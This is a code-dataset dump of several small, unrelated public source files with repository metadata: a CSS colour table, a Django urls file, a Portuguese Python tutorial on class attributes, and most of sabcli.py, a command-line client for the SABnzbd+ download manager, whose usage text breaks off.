'silver': (192, 192, 192, 1.0),
'gray': (128, 128, 128, 1.0),
'white': (255, 255, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'red': (255, 0, 0, 1.0),
'purple': (128, 0, 128, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'green': (0, 128, 0, 1.0),
'lime': (0, 255, 0, 1.0),
'olive': (128, 128, 0, 1.0),
'yellow': (255, 255, 0, 1.0),
'navy': (0, 0, 128, 1.0),
'blue': (0, 0, 255, 1.0),
'teal': (0, 128, 128, 1.0),
'aqua': (0, 255, 255, 1.0),
'aliceblue': (240, 248, 255, 1.0),
'antiquewhite': (250, 235, 215, 1.0),
'aqua': (0, 255, 255, 1.0),
'aquamarine': (127, 255, 212, 1.0),
'azure': (240, 255, 255, 1.0),
'beige': (245, 245, 220, 1.0),
'bisque': (255, 228, 196, 1.0),
'black': (0, 0, 0, 1.0),
'blanchedalmond': (255, 235, 205, 1.0),
'blue': (0, 0, 255, 1.0),
'blueviolet': (138, 43, 226, 1.0),
'brown': (165, 42, 42, 1.0),
'burlywood': (222, 184, 135, 1.0),
'cadetblue': (95, 158, 160, 1.0),
'chartreuse': (127, 255, 0, 1.0),
'chocolate': (210, 105, 30, 1.0),
'coral': (255, 127, 80, 1.0),
'cornflowerblue': (100, 149, 237, 1.0),
'cornsilk': (255, 248, 220, 1.0),
'crimson': (220, 20, 60, 1.0),
'cyan': (0, 255, 255, 1.0),
'darkblue': (0, 0, 139, 1.0),
'darkcyan': (0, 139, 139, 1.0),
'darkgoldenrod': (184, 134, 11, 1.0),
'darkgray': (169, 169, 169, 1.0),
'darkgreen': (0, 100, 0, 1.0),
'darkgrey': (169, 169, 169, 1.0),
'darkkhaki': (189, 183, 107, 1.0),
'darkmagenta': (139, 0, 139, 1.0),
'darkolivegreen': (85, 107, 47, 1.0),
'darkorange': (255, 140, 0, 1.0),
'darkorchid': (153, 50, 204, 1.0),
'darkred': (139, 0, 0, 1.0),
'darksalmon': (233, 150, 122, 1.0),
'darkseagreen': (143, 188, 143, 1.0),
'darkslateblue': (72, 61, 139, 1.0),
'darkslategray': (47, 79, 79, 1.0),
'darkslategrey': (47, 79, 79, 1.0),
'darkturquoise': (0, 206, 209, 1.0),
'darkviolet': (148, 0, 211, 1.0),
'deeppink': (255, 20, 147, 1.0),
'deepskyblue': (0, 191, 255, 1.0),
'dimgray': (105, 105, 105, 1.0),
'dimgrey': (105, 105, 105, 1.0),
'dodgerblue': (30, 144, 255, 1.0),
'firebrick': (178, 34, 34, 1.0),
'floralwhite': (255, 250, 240, 1.0),
'forestgreen': (34, 139, 34, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'gainsboro': (220, 220, 220, 1.0),
'ghostwhite': (248, 248, 255, 1.0),
'gold': (255, 215, 0, 1.0),
'goldenrod': (218, 165, 32, 1.0),
'gray': (128, 128, 128, 1.0),
'green': (0, 128, 0, 1.0),
'greenyellow': (173, 255, 47, 1.0),
'grey': (128, 128, 128, 1.0),
'honeydew': (240, 255, 240, 1.0),
'hotpink': (255, 105, 180, 1.0),
'indianred': (205, 92, 92, 1.0),
'indigo': (75, 0, 130, 1.0),
'ivory': (255, 255, 240, 1.0),
'khaki': (240, 230, 140, 1.0),
'lavender': (230, 230, 250, 1.0),
'lavenderblush': (255, 240, 245, 1.0),
'lawngreen': (124, 252, 0, 1.0),
'lemonchiffon': (255, 250, 205, 1.0),
'lightblue': (173, 216, 230, 1.0),
'lightcoral': (240, 128, 128, 1.0),
'lightcyan': (224, 255, 255, 1.0),
'lightgoldenrodyellow': (250, 250, 210, 1.0),
'lightgray': (211, 211, 211, 1.0),
'lightgreen': (144, 238, 144, 1.0),
'lightgrey': (211, 211, 211, 1.0),
'lightpink': (255, 182, 193, 1.0),
'lightsalmon': (255, 160, 122, 1.0),
'lightseagreen': (32, 178, 170, 1.0),
'lightskyblue': (135, 206, 250, 1.0),
'lightslategray': (119, 136, 153, 1.0),
'lightslategrey': (119, 136, 153, 1.0),
'lightsteelblue': (176, 196, 222, 1.0),
'lightyellow': (255, 255, 224, 1.0),
'lime': (0, 255, 0, 1.0),
'limegreen': (50, 205, 50, 1.0),
'linen': (250, 240, 230, 1.0),
'magenta': (255, 0, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'mediumaquamarine': (102, 205, 170, 1.0),
'mediumblue': (0, 0, 205, 1.0),
'mediumorchid': (186, 85, 211, 1.0),
'mediumpurple': (147, 112, 219, 1.0),
'mediumseagreen': (60, 179, 113, 1.0),
'mediumslateblue': (123, 104, 238, 1.0),
'mediumspringgreen': (0, 250, 154, 1.0),
'mediumturquoise': (72, 209, 204, 1.0),
'mediumvioletred': (199, 21, 133, 1.0),
'midnightblue': (25, 25, 112, 1.0),
'mintcream': (245, 255, 250, 1.0),
'mistyrose': (255, 228, 225, 1.0),
'moccasin': (255, 228, 181, 1.0),
'navajowhite': (255, 222, 173, 1.0),
'navy': (0, 0, 128, 1.0),
'oldlace': (253, 245, 230, 1.0),
'olive': (128, 128, 0, 1.0),
'olivedrab': (107, 142, 35, 1.0),
'orange': (255, 165, 0, 1.0),
'orangered': (255, 69, 0, 1.0),
'orchid': (218, 112, 214, 1.0),
'palegoldenrod': (238, 232, 170, 1.0),
'palegreen': (152, 251, 152, 1.0),
'paleturquoise': (175, 238, 238, 1.0),
'palevioletred': (219, 112, 147, 1.0),
'papayawhip': (255, 239, 213, 1.0),
'peachpuff': (255, 218, 185, 1.0),
'peru': (205, 133, 63, 1.0),
'pink': (255, 192, 203, 1.0),
'plum': (221, 160, 221, 1.0),
'powderblue': (176, 224, 230, 1.0),
'purple': (128, 0, 128, 1.0),
'red': (255, 0, 0, 1.0),
'rosybrown': (188, 143, 143, 1.0),
'royalblue': (65, 105, 225, 1.0),
'saddlebrown': (139, 69, 19, 1.0),
'salmon': (250, 128, 114, 1.0),
'sandybrown': (244, 164, 96, 1.0),
'seagreen': (46, 139, 87, 1.0),
'seashell': (255, 245, 238, 1.0),
'sienna': (160, 82, 45, 1.0),
'silver': (192, 192, 192, 1.0),
'skyblue': (135, 206, 235, 1.0),
'slateblue': (106, 90, 205, 1.0),
'slategray': (112, 128, 144, 1.0),
'slategrey': (112, 128, 144, 1.0),
'snow': (255, 250, 250, 1.0),
'springgreen': (0, 255, 127, 1.0),
'steelblue': (70, 130, 180, 1.0),
'tan': (210, 180, 140, 1.0),
'teal': (0, 128, 128, 1.0),
'thistle': (216, 191, 216, 1.0),
'tomato': (255, 99, 71, 1.0),
'turquoise': (64, 224, 208, 1.0),
'violet': (238, 130, 238, 1.0),
'wheat': (245, 222, 179, 1.0),
'white': (255, 255, 255, 1.0),
'whitesmoke': (245, 245, 245, 1.0),
'yellow': (255, 255, 0, 1.0),
'yellowgreen': (154, 205, 50, 1.0),
}
|
[
"iabouelftouh@trudoc24x7.com"
] |
iabouelftouh@trudoc24x7.com
|
2e57626e4bb2e712bdfee4e51a5d28344f6a7fcf
|
3b0ee58fb38780c9a6a81e9c22686adf03e8bdee
|
/publish-events.py
|
9c259eb82b6768103ae81ea1072461a26677961b
|
[] |
no_license
|
gsherwin3/sonic-nas-manifest
|
7061a0f3534c34cfceb612976ccfc789e3b0e43e
|
4c8fe47374d7a65baecb168b2e9ee654761e295d
|
refs/heads/master
| 2020-06-28T21:03:02.069209
| 2016-10-27T16:22:23
| 2016-10-27T16:22:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
# Python code block to publish events
import cps
import cps_utils
# Create handle to connect to event service
handle = cps.event_connect()
# Create CPS object
obj = cps_utils.CPSObject('base-port/interface',qual='observed', data= {"ifindex":23})
# Publish the event
cps.event_send(handle, obj.get())
|
[
"noreply@github.com"
] |
gsherwin3.noreply@github.com
|
79ec10a6c2cd2eb5753da2872644f311bf6deecd
|
f752ca1367a85cf4413d1b0b9403976f2e67f7c7
|
/loo.py
|
7f506ae5dced5ff197167f82f637ce2d933bc0cf
|
[] |
no_license
|
raferalston/proverka
|
0cb3da2111fae2e6fc53da06aa7b9c74bb90b70d
|
b28afe8430fee02b3673dffa622cbd9977084fe5
|
refs/heads/main
| 2023-05-14T22:50:13.031900
| 2021-05-21T13:44:27
| 2021-05-21T13:44:27
| 369,549,662
| 0
| 0
| null | 2021-05-21T13:47:26
| 2021-05-21T13:47:26
| null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
i = int(input())
s = int(input())
y = int(input())
def loo(i, s ,y):
while y != 0:
s = i / 100 * s + s
y = y - 1
return s
print(loo(i, s, y))
|
[
"noreply@github.com"
] |
raferalston.noreply@github.com
|
e43cfc6aa1633a9191785d3f556f8d0272598293
|
130d5455b1974710515ba4761d3b6780315725df
|
/core/orm/common.py
|
13e75a0a5dfe391691999bb199f9ad9f1d95f29c
|
[] |
no_license
|
Illicitus/aiohttp-playground
|
f3711af5aa3ddb5bad4f905b7045f4947684ae70
|
d0fdb54b4a35d5714e43f99c6ef1aee3bd37e107
|
refs/heads/main
| 2023-04-03T06:57:01.488181
| 2021-04-11T18:43:04
| 2021-04-11T18:43:04
| 349,416,149
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
from pydantic import ValidationError
from core.responses.json import NotFound
|
[
"honchar.vitalii@gmail.com"
] |
honchar.vitalii@gmail.com
|
18dec9909a2f079119d67538333ae4ba3f2c8476
|
f3ccbc61c9a968e130536f66ec896393ea2ad463
|
/test/tp.py
|
bed900aab528b53223cc14f5438c94f8c3bb02bc
|
[] |
no_license
|
rutikatuscano22/Folder3
|
69f563cf1ec0fe71242bcaf99e7cefc44b70068d
|
59e5ba5e5c91221625567e629e4daf5601ab97ad
|
refs/heads/main
| 2023-04-16T08:26:36.762625
| 2021-04-28T15:49:41
| 2021-04-28T15:49:41
| 362,525,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14
|
py
|
print('sdf')
|
[
"noreply@github.com"
] |
rutikatuscano22.noreply@github.com
|
655594a78e371613ede21c222f5abad2afe4b62f
|
907efd02ac6920adac86571f46b89b05644b1e99
|
/apps/courseApp/urls.py
|
094d5c188c9aa63976caa218af96e83c4285d180
|
[] |
no_license
|
RyanGKist/DjangoCourses
|
3f2333fa26dfec5b6fc5492e04f098a26ac1b038
|
877d4f239b930f0089febaffdca870eee325178e
|
refs/heads/master
| 2021-08-14T15:13:42.822507
| 2017-11-16T02:58:13
| 2017-11-16T02:58:13
| 110,915,224
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$' , views.index),
url(r'^courseAdd$', views.course_create),
url(r'^remove(?P<uid>\d+)$', views.destroy),
url(r'^destroy(?P<uid>\d+)$', views.destroy_data)
]
|
[
"RyanGKistner@Patricks-MacBook-Pro-2.local"
] |
RyanGKistner@Patricks-MacBook-Pro-2.local
|
377d8d2bcde9cc96994429bc34f03d2d7d68a11e
|
1d8ce00008e6f6cbb7f2728ea7e7b9af28b1a7c4
|
/guppe/POO/atributos.py
|
23709c67c5114837d0ea26e7fa497e4c92bae1d8
|
[] |
no_license
|
HigorSenna/python-study
|
05d09e09075dc2eb9c4f790928d68aab0c8a18b5
|
9b1a0c5e487b3cd397f371c7c4648148430e13d9
|
refs/heads/master
| 2022-12-03T00:16:53.075812
| 2020-08-17T15:54:01
| 2020-08-17T15:54:01
| 285,556,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,479
|
py
|
"""
Atributos
Em Python, por convenção, ficou estabelecido que todo atributo de uma classe deve ser PUBLICO, caso queira colocar
privado, é so usar __ em sua declaracao
"""
# Classe com atributos privados
class Lampada:
# OBS: Atributos privados: __nome
def __init__(self, voltagem, cor): # Construtor
self.__voltagem = voltagem
self.__cor = cor
self.__ligada = False
@property
def voltagem(self):
return self.__voltagem
@property
def cor(self):
return self.__cor
@property
def ligada(self):
return self.__ligada
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
acesso = Acesso('email@gmail.com', '123456')
print(acesso.email)
# print(acesso.__senha) # AtributeError
# Name Mangling -> conseguimos acessar um atributo mesmo sendo privado (nao recomendado)
print(acesso._Acesso__senha)
# Classe com atributos publicos
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
# Em python, o primeiro atributo de um método é sempre a referencia do objeto, e como convenção sempre devemos chama-lo
# de self, porém podemos colocar qualquer nome:
class ContaPoupanca:
def __init__(this, numero, limite, saldo):
this.numero = numero
this.limite = limite
this.saldo = saldo
# ATRIBUTOS DE CLASSE (em Java: static)
from random import random
class Produto:
imposto = 1.05 # Atributo de instancia
def __init__(self, nome, valor):
self.id = random()
self.nome = nome
self.valor = (valor * Produto.imposto)
p1 = Produto('PS4', 2300)
print(p1.imposto) # Acesso possivel más incorreto para acesso ao atributo de classe, forma correta:
print(Produto.imposto)
p2 = Produto('PS5', 6000)
# Atributos Dinâmicos (Não comum)
# - É um atributo de instância que pode ser criado em tempo de execução e será exclusivo da instância que o criou
p3 = Produto('Xbox', 2300)
p3.peso = '5Kg' # Note que na classe produto nao existe o atributo peso
print(p3.peso)
# Listando os objetos com seus respectivos valores:
print(p3.__dict__) # Pega os atributos de INSTÂNCIA com seus valores e transforma e retorna um dicionario
# Deletando atributos
del p3.peso
print(p3.__dict__)
del p3.nome
print(p3.__dict__) # Posso deletar qualquer atributo de instância
|
[
"higorrebjfmg@gmail.com"
] |
higorrebjfmg@gmail.com
|
5f3434db4874c48ac89e9ef698be689a2749935d
|
48730c1fcacffd5ada10c6074fbc096e0ce354c9
|
/sabcli.py
|
cff26e65217ffc5a457fc1b51fadd49c8d603159
|
[] |
no_license
|
TobiasTheViking/sabcli
|
d1e8daea1cf686cb78e1983f555bc868810fda1f
|
11ecd604c3a76f78bb5f6dcd4fb714275e3da2c3
|
refs/heads/master
| 2020-05-18T10:51:13.562988
| 2013-04-24T17:38:56
| 2013-04-24T17:38:56
| 9,624,084
| 7
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,806
|
py
|
#!/usr/bin/env python
''' Command Line Interface for sabnzbd+
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
COPYING: http://www.gnu.org/licenses/gpl.txt
Copyright 2010 Tobias Ussing
Acknowledgements:
Meethune Bhowmick - For the original code for the 0.4 api
Henrik Mosgaard Jensen - For testing, critique layout and usability.
'''
import os, sys, time, httplib
import xml.etree.ElementTree as ElementTree
import getopt, ConfigParser
from threading import Thread
VERSION="0.5-11"
APIVERSION="0.5.4"
# TextColour
class tc:
black = '\x1B[30;49m'
red = "\x1B[31;49m"
green = '\x1B[32;49m'
yellow = '\x1B[33;49m'
blue = '\x1B[34;49m'
magenta = '\x1B[35;49m'
cyan = '\x1B[36;49m'
white = '\x1B[37;49m'
bold = '\x1B[1;49m'
end = '\x1B[m'
class monitor(Thread):
def __init__ (self, value):
Thread.__init__(self)
self.cont = True
self.delay = value
def run(self):
time.sleep(2)
sys.stdin.readline()
print 'Exiting watch mode after next loop.'
self.cont = False
class SABnzbdCore( object ):
''' Sabnzbd Automation Class '''
def __init__(self, config = None):
self.config = config
if not self.config:
self.config = { 'host' : 'localhost', 'port' : '8080',
'username' : None, 'password;' : None,
'apikey' : None },
# Public Variables
self.fetchpath = ''
self.servername = ''
self.header = {}
self.postdata = None
self.command_status = 'ok'
self.return_data = {}
self.retval = ''
self.url = 'http://' + self.servername + '/sabnzbd/'
self.job_option = '3'
self.debug = None
self.watchdelay = None
self.width = int(os.popen('stty size', 'r').read().split()[1])
# Private Methods
def xml_to_dict(self, el):
d={}
if el.text:
d[el.tag] = el.text
else:
d[el.tag] = None
for child in el:
if child:
if len(child) == 1 or child[0].tag != child[1].tag:
d[child.tag] = self.xml_to_dict(child)
else:
temp = []
for subitem in child:
if subitem.text != None:
temp.append(subitem.text)
else:
temp2 = self.xml_to_dict(subitem)
temp.append(temp2)
d[child.tag] = { subitem.tag : temp }
else:
d[child.tag] = child.text
return d
def __parse_status(self, command, status_obj):
''' Convert web output to boolean value '''
# Web output should only be 'ok\n' or 'error\n'
self.retval = status_obj.lower().strip('\n')
self.command_status = self.retval
if self.retval == 'ok' :
return True
if self.retval == 'error' :
return False
if command in ('version', 'move', 'priority'):
return self.retval
''' Convert status object to python dictionary '''
# Fix broken xml from sabnzbd
if command == 'warnings':
temp = status_obj.replace("<warnings>","<root>\n<warnings>")
status_obj = temp.replace("</warnings>","</warnings></root>")
if command == 'details':
temp = status_obj.replace("<files>","<root>\n<files>")
status_obj = temp.replace("</files>","</files></root>")
try:
status_obj = status_obj.replace('&', '&')
root = ElementTree.XML(status_obj.strip())
self.return_data = self.xml_to_dict(root)
if self.debug:
print
for a in self.return_data.keys():
print "%s - %s" % ( a, self.return_data[a] )
print
self.command_status = 'ok'
except ValueError:
self.command_status = 'error'
return False
return True
def __send_request(self, command, path):
''' Send command to server '''
data = ''
try:
conn = httplib.HTTPConnection(self.servername)
conn.request('POST' if self.postdata else 'GET', path, self.postdata, self.header)
try:
response = conn.getresponse()
except httplib.BadStatusLine:
raise Exception
if response.status != 200:
msg = str(response.status) + ':' + response.reason
raise httplib.HTTPException(msg)
data = response.read()
conn.close()
except httplib.HTTPException, err:
self.command_status = 'http://' + self.servername + path + ' -> ' + err.message
return False
except:
self.command_status = "Cannot connect to " + self.servername + path
return False
return data
# Public Methods
def setConnectionVariables(self):
# Set Connection Variables
self.fetchpath = '/api?apikey=' + self.config ['apikey'] + '&mode='
self.servername = self.config['host'] + ':' + self.config['port']
self.header = { 'User-Agent' : 'SabnzbdAutomation' }
# Setup authentication if needed.
if self.config['username'] and self.config['password']:
self.postdata = 'ma_password=' + self.config['password'] + '&' +\
'ma_username=' + self.config['username']
self.header['Content-type'] = 'application/x-www-form-urlencoded'
else:
self.postdata = None
self.url = 'http://' + self.servername + '/sabnzbd/'
def send_command(self, command, args = None,):
''' http://sabnzbdplus.wiki.sourceforge.net/Automation+Support '''
url_fragment = command
if args == None:
if command in ('version', 'shutdown', 'restart'):
url_fragment += ''
elif command == 'queue':
url_fragment += '&start=START&limit=LIMIT&output=xml'
elif command == 'history':
url_fragment += '&start=START&limit=LIMIT&output=xml'
elif command == 'warnings':
url_fragment += '&output=xml'
elif command == 'pause':
url_fragment = 'pause'
elif command == 'resume':
url_fragment = 'resume'
else:
print 'unhandled command: ' + command
usage(2)
elif len(args) == 1:
if command in ('addfile', 'addurl', 'addid'):
url_fragment += '&name=' + args[0] + '&pp=' + self.job_option
elif command == 'newapikey':
if args[0] == 'confirm':
url_fragment = 'config&name=set_apikey'
else:
print 'unhandled command: ' + command
usage(2)
elif command == 'queuecompleted':
url_fragment = 'queue&name=change_complete_action&value=' + args[0]
elif command == 'pathget':
url_fragment = 'addlocalfile&name=' + args[0]
elif command == 'delete':
url_fragment = 'queue&name=delete&value=' + args[0]
elif command == 'details':
url_fragment = 'get_files&output=xml&value=' + args[0]
elif command == 'speedlimit':
url_fragment = 'config&name=speedlimit&value=' + args[0]
elif command == 'autoshutdown':
if args not in ('0', '1'):
return False
else:
url_fragment += '&name=' + args[0]
elif command == 'pause':
url_fragment = 'queue&name=pause&value=' + args[0]
elif command == 'temppause':
url_fragment = 'config&name=set_pause&value=' + args[0]
elif command == 'resume':
url_fragment = 'queue&name=resume&value=' + args[0]
elif command == 'history':
if args[0] == 'clear':
url_fragment += '&name=delete&value=all'
else:
usage(2)
else:
print 'unhandled command: ' + command
usage(2)
elif len(args) == 2:
if command == 'rename':
url_fragment = 'queue&name=rename&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'priority':
url_fragment = 'queue&name=priority&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'postprocessing':
url_fragment = 'change_opts&value=' + str(args[0]) + '&value2=' + str(args[1])
elif command == 'move':
url_fragment = 'switch&value=' + str(args[0]) + '&value2=' + str(args[1])
else:
print 'unhandled command: ' + command
usage(2)
else:
print 'unhandled command: ' + command
usage(2)
self.url = 'http://' + self.servername + self.fetchpath + url_fragment
if self.debug:
print self.url
data = self.__send_request(command, self.fetchpath + url_fragment)
if data == False:
return False
return self.__parse_status(command, data)
def getNZO_id(self, index = '-1'):
self.send_command('queue')
nzo_id = None
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
for each in slots:
if each['index'] == index:
nzo_id = each['nzo_id']
return nzo_id
def getName(self, nzo_id = ''):
self.send_command('queue')
name = ''
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
for each in slots:
if each['nzo_id'] == nzo_id:
name = each['filename']
return name
def printLine(self, segments):
# Calculate spacing between segments in line.
space = self.width
for segment in segments:
space -= len(segment)
if len(segments) > 1:
space = space / (len(segments)-1)
if space <= 0:
space = 1
# Combine segments with equal spacing
combined = ''
for segment in segments:
combined += segment + " " * space
# Remove trailing whitespaces from above.
return combined.strip()
def insert(self, original, new, pos):
'''Inserts new inside original at pos.'''
return original[:pos] + new + original[pos:]
def print_header(self):
''' Print pretty table with status info '''
if float(self.return_data['mbleft']) / 1024 > float(self.return_data['diskspace2']):
print tc.red + tc.bold + "WARNING:" + tc.end + " Insufficient free disk space left to finish queue.\n"
if float(self.return_data['mbleft']) / 1024 > float(self.return_data['diskspacetotal2']):
print tc.red + tc.bold + "WARNING:" + tc.end + " Insufficient total disk space to finish queue.\n"
preline = 'Free/Total Disk: %.2f / %.2f GB' % \
( float(self.return_data['diskspace2']),
float(self.return_data['diskspacetotal2']) )
if self.return_data['paused'] == 'True':
postline = "Speed: Paused"
else:
postline = "Speed: %.2f kb/s" % float(self.return_data['kbpersec'])
tempLine = self.printLine([preline, postline])
# Adding color. Because of printLine it MUST be done with replace.
tempLine = tempLine.replace('Speed: ', 'Speed: ' + tc.cyan)
tempLine = tempLine.replace('kb/s', tc.end + 'kb/s')
tempLine = tempLine.replace('Paused', 'Paused' + tc.end)
print tempLine
if 'total_size' in self.return_data:
# History view
print(str('Transferred Total: %s - Month: %s - Week: %s' % \
( self.return_data['total_size'], self.return_data['month_size'], self.return_data['week_size'])).center(self.width))
else:
# Queue view or pre 0.5.2 view
print(str('Queue: %.2f / %.2f GB [%2.0f%%] [Up: %s]' % \
( ( float(self.return_data['mb']) -
float(self.return_data['mbleft']) ) / 1024 ,
float(self.return_data['mb']) / 1024,
100*( float(self.return_data['mb']) -
float(self.return_data['mbleft']))/(float(self.return_data['mb'])+0.01), self.return_data['uptime'])).center(self.width))
def print_queue(self):
self.print_header()
print self.printLine(['# - Filename [Age/Priority/Options] (Status)', 'Downloaded/Total (MB) [pct]'])
print '-' * self.width
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
tailLength = 0
for each in slots:
if tailLength < len(each['mb']):
tailLength = len(each['mb'])
tailLength += tailLength
for each in slots:
opts = ['Download', 'Repair', 'Unpack', 'Delete']
# Line 1
print "%s - %s [%s/%s/%s] (%s)" % ( tc.green + each['index'] + tc.end, each['filename'], tc.green + each['avg_age'] + tc.end, tc.green + each['priority'] + tc.end, \
tc.green + opts[int(each['unpackopts'])] + tc.end, tc.green + each['status'] + tc.end )
# Line 2
time = each['timeleft']
if len(each['timeleft']) == 7:
time = "0" + time
tail = "%.2f / %.2f [%2.0f%%]" % ( float(each['mb'])-float(each['mbleft']), float(each['mb']), float(each['percentage']) )
tail2 = "%s%.2f %s/ %s%.2f %s[%s%2.0f%%%s]" % (tc.red, float(each['mb'])-float(each['mbleft']), tc.end, tc.red, float(each['mb']), \
tc.end, tc.red, float(each['percentage']), tc.end )
tail2= " " * ( tailLength + 9 - len(tail)) + tail2
charsLeft = self.width - len(time) - len(tail) - 9 - ( tailLength + 9 - len(tail))
pct = (charsLeft)/100.0 * float(each['percentage'])
progress = "="* int(pct) + ">" + " " * (charsLeft-int(pct))
print " " + tc.red + time + tc.end + " " + tc.bold + tc.yellow + "[" + progress + "]" + tc.end + " " + tail2
print
return True
def print_details(self):
print 'Filename'
print '-' * self.width
if self.return_data['files'] != None:
try:
self.return_data['files']['file'].keys()
files = [ self.return_data['files']['file'] ]
except AttributeError:
files = self.return_data['files']['file']
for each in files:
print each['filename']
print " - [Status: %s] [Downloaded: %s/%s MB]" % ( each['status'], float(each['mb']) - float(each['mbleft']), float(each['mb']) )
print
return True
def print_history(self):
self.print_header()
print 'Filename'
print '-' * self.width
if self.return_data['slots'] != None:
try:
self.return_data['slots']['slot'].keys()
slots = [ self.return_data['slots']['slot'] ]
except AttributeError:
slots = self.return_data['slots']['slot']
slots.reverse()
for each in slots:
print each['name']
par2 = ''
unpack = ''
log = ''
stage_log = each['stage_log']
if stage_log != None:
try:
stage_log['slot'].keys()
items = [ stage_log['slot'] ]
except AttributeError:
items = stage_log['slot']
for item in items:
if item['name'] == "Unpack":
if type(item['actions']['item']) == str:
data = [item['actions']['item']]
else:
data = item['actions']['item']
fail = 0
for subdata in data:
if str.find(subdata, 'Unpacked') != -1:
unpack = '[unpack: ' + tc.green + tc.bold + 'OK' + tc.end +']'
else:
log += " - " + tc.red + subdata + tc.end + "\n"
fail += 1
if fail > 0:
unpack = '[unpack: ' + tc.red + 'FAIL' + tc.end + ']'
elif item['name'] == "Repair":
if type(item['actions']['item']) == str:
data = [item['actions']['item']]
else:
data = item['actions']['item']
fail = 0
for subdata in data:
if str.find(subdata, 'Quick Check OK') != -1:
par2 = '[par2: ' + tc.green + tc.bold + 'OK' + tc.end +']'
elif str.find(subdata, 'Repaired in') != -1:
par2 = '[par2: ' + tc.green + tc.bold + 'OK' + tc.end +']'
else:
log += " - " + subdata.replace("Repair failed", tc.red + "Repair failed") + tc.end + "\n"
fail += 1
if fail > 0:
par2 = '[par2: ' + tc.red + tc.bold + 'FAIL' + tc.end + ']'
print ' - [download: %s] %s %s' % ( each['size'], par2, unpack )
print log
return True
def print_warnings(self):
''' Print pretty table with status info '''
if self.return_data['warnings'] != None:
try:
self.return_data['warnings'].keys()
slots = [ self.return_data['warnings']['warning'] ]
except AttributeError:
slots = self.return_data['warnings']['warning']
if slots[0][0] != 1:
slots = slots[0]
for each in slots:
warning = each.split("\n")
line = "[%s] %s" % ( warning[0], warning[1] )
if len(line) < 33:
line = line + " " * (33-len(line))
line += " | " + warning[2]
print line
print
return True
def print_version(self):
print 'sabcli: ' + VERSION + '\nAPI Version: ' + APIVERSION + '\nSABnzbd Version: ' + self.retval + '\n'
if APIVERSION == self.retval:
print 'Versions match'
else:
print 'Versions mismatch'
return True
def watch(self, command, command_arg):
# s = monitor(self.watchdelay)
# s.start()
# cont = s.cont
while True:
print '\x1B[2J'
print '\x1B[1;1H'
print self.printLine(['Refreshing in : ' + str(self.watchdelay) + ' seconds. Press CTRL-C to quit (can take up to '+ str(self.watchdelay) + ' seconds to quit).', 'Last refresh: ' + time.strftime("%H:%M:%S", time.localtime())])
print
run_commands(self, command, command_arg)
time.sleep(self.watchdelay)
# s.join()
print
def usage(exitval):
''' Usage '''
msg = sys.argv[0].split('/').pop()
msg += " " + tc.cyan + "<command> <args>" + tc.end + "\n\n"
msg += "Compatible with SABnzbd+: " + APIVERSION + "\n\n"
msg += "Commands:\n\tpause " + tc.cyan + "[id]" + tc.end + "\n\tresume " + tc.cyan + "[id]" + tc.end + "\n\tshutdown\n\trestart\n\tversion\n\tqueue\t\t\t\t(watchable)\n\twarnings\t\t\t(watchable)\n\tdetails " + tc.cyan + "<id>" + tc.end + "\t\t\t(watchable)\n\tmove " + tc.cyan + "<id> <new position>" + tc.end + " \n"
msg += "\thistory " + tc.cyan + "[clear]" + tc.end + "\t\t\t(watchable)\n\tnewapikey " + tc.cyan + "<confirm>" + tc.end + "\n\tspeedlimit " + tc.cyan + "<value>" + tc.end + "\n\tnewzbin " + tc.cyan + "<id>" + tc.end + "\n\taddurl " + tc.cyan + "<nzb url>" + tc.end + "\n\tpathget " + tc.cyan + "<nzb path>" + tc.end + "\n\ttemppause " + tc.cyan + "<minutes>" + tc.end + "\n"
msg += "\trename " + tc.cyan + "<id> <newname>" + tc.end + "\n\tdelete " + tc.cyan + "<id>" + tc.end + "\t\t\t| all = clear queue. Multiple id's can be given\n\tpriority " + tc.cyan + "<id> <value>" + tc.end + "\t\t| -1 = Low, 0 = Normal, 1 = High, 2 = Force\n"
msg += "\tpostprocessing " + tc.cyan + "<id> <value>" + tc.end + "\t| 0 = Skip, 1 = Repair, 2 = Unpack, 3 = Delete\n"
msg += "\tqueuecompleted " + tc.cyan + "<path to script>" + tc.end + "\t| implemented, not confirmed\n";
msg += "\nArguments:\n\t-h [--help]\t\t\tHelp screen\n\t-j [--job-option=3]\t\tSet job-option\n\t-H [--hostname=localhost]\tHostname\n\t-P [--port=8080]\t\tPort\n"
msg += "\t-u [--username=user]\t\tUsername\n\t-p [--password=pass]\t\tPassword\n\t-a [--apikey=15433acd...]\tApikey\n\t-w [--watch=X]\t\t\tRerun command every X seconds\n\t\t\t\t\tStandard action is 'queue'\n\t\t\t\t\tCan watch all commands marked (watchable)\n"
